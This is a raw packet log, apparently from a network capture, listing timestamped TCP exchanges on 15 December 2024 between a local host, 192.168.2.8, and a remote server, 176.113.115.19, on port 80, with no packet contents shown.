                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.684357882 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.684408903 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.684429884 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.684540033 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.689026117 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.689076900 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.689155102 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.689198971 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.693732977 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.693785906 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.693839073 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.693892002 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.698416948 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.698471069 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.698636055 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.698698997 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.703119993 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.703190088 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.703217983 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.703327894 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.707874060 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.707926035 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.707993984 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.708081961 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.712563992 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.712625980 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.712726116 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.712775946 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.717196941 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.717314005 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.717364073 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.717415094 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.721864939 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.721914053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.721924067 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.721971989 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.726599932 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.726649046 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.726689100 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.726733923 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.731393099 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.731472015 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.731472015 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.731538057 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.735989094 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.736063957 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.736072063 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.736238003 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.740673065 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.740755081 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.740783930 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.740849972 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.850514889 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.850661039 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.850676060 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.850733042 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.852577925 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.852648020 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.852708101 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.852775097 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.856688976 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.856733084 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.856779099 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.856779099 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.860574961 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.860637903 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.860727072 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.860784054 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.864716053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.864769936 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.864813089 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.864862919 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.868654966 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.868716002 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.868761063 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.868812084 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.872468948 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.872536898 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.872582912 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.872641087 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.876121044 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.876189947 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.876229048 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.876279116 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.879909992 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.879960060 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.879987001 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.880023003 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.883590937 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.883651018 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.883702040 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.883758068 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.887296915 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.887347937 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.887396097 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.887448072 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.891016006 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.891077042 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.891119003 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.891174078 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.894731998 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.894793034 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.894826889 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.894876003 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898466110 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898523092 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898550034 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898602009 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902230024 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902273893 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902285099 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902318001 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.905888081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.905971050 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.905971050 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.906008959 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909626961 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909691095 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909722090 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909778118 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913351059 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913415909 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913474083 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913530111 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917035103 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917097092 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917141914 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917196989 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.920881987 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.920955896 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.921020031 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.921071053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924597025 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924657106 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924698114 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924750090 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928236008 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928297043 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928344011 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928410053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.931978941 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.932033062 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.932127953 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.932183981 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935683012 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935750008 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935791016 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935836077 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939515114 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939589977 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939593077 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939636946 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943176031 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943243027 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943284035 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943348885 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.946846008 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.946902037 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.946984053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.947037935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950587988 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950639963 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950689077 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950737000 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954330921 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954389095 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954463005 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954514980 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958066940 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958121061 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958153963 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958205938 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961752892 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961829901 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961864948 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961920977 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046216965 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046281099 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046282053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046323061 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047605038 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047653913 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047732115 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047777891 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.050664902 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.050717115 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.050765038 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.050826073 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.053751945 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.053802013 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.053833961 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.053878069 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.056818962 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.056870937 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.056916952 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.056966066 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.059772968 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.059834957 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.059875011 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.059923887 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.062735081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.062793970 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.062830925 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.062879086 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.065531015 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.065587044 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.065591097 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.065630913 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.068279028 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.068345070 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.068408966 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.068455935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.071140051 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.071213007 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.071281910 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.071341038 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.073807001 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.073925018 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.073930979 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.073996067 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.076581955 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.076638937 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.076642990 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.076678038 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.079112053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.079169989 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.079194069 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.079233885 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.081712008 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.081779003 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.081819057 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.081883907 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.084357977 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.084424973 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.084505081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.084547043 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.086826086 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.086880922 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.087012053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.087057114 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.089359045 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.089420080 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.089456081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.089499950 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.091885090 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.091959953 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.091969013 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.092010975 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.094309092 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.094363928 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.094435930 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.094479084 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.096910954 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.096961021 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.097002029 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.097065926 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.099370003 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.099445105 CET4970680192.168.2.8176.113.115.19
